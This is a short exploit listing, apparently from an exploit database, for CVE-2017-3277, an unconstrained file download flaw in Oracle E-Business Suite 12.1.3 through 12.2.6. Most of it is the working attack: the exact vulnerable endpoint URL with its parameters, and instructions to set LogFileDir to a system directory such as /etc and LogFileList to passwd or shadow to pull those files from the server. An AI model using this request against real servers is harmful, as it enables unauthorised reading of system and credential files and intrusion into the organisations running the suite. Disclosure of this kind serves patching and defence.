Oracle E-Business Suite versions 12.1.3, 12.2.3, 12.2.4, 12.2.5, and 12.2.6 suffer from an unconstrained file download vulnerability.
9aae3dbd6f7dc3149e3d98324e0cd339aa6a4a5b85500b4164c9b406d0301082
# Exploit Title: [Unconstrained File Download - Oracle E-Business Suite]
# Exploit Discoverer: [Owais Mehtab, Tayeeb Rana]
# Vendor Homepage: [http://www.oracle.com]
# Version: [12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6]
# CVE: 2017-3277
[Attack Vectors]
exploitation may be done by sending a post request to following url
http://example.com/OA_HTML/weboam/oam/patch/timing/ViewLogFiles$programRunId=8548$sessionId=231730$page*_session*_id=231730$utilityFlag=Completed$startDate=1472726192000$taskName=AutoPatch_20-_20u21444745.drv$lastUpdate=1472726297000$status=Completed$taskid=231730$taskId=231730$totalRunTime=1_20min,_2045_20sec$utilityName=adpatch$target=FINchange
Change the following in post request:-
1-The LogFileDir parameter to any system directory (e.g., /etc)
2-The LogFileList:key:1 parameter value to the file name that needs to be downloaded (passwd or shadow)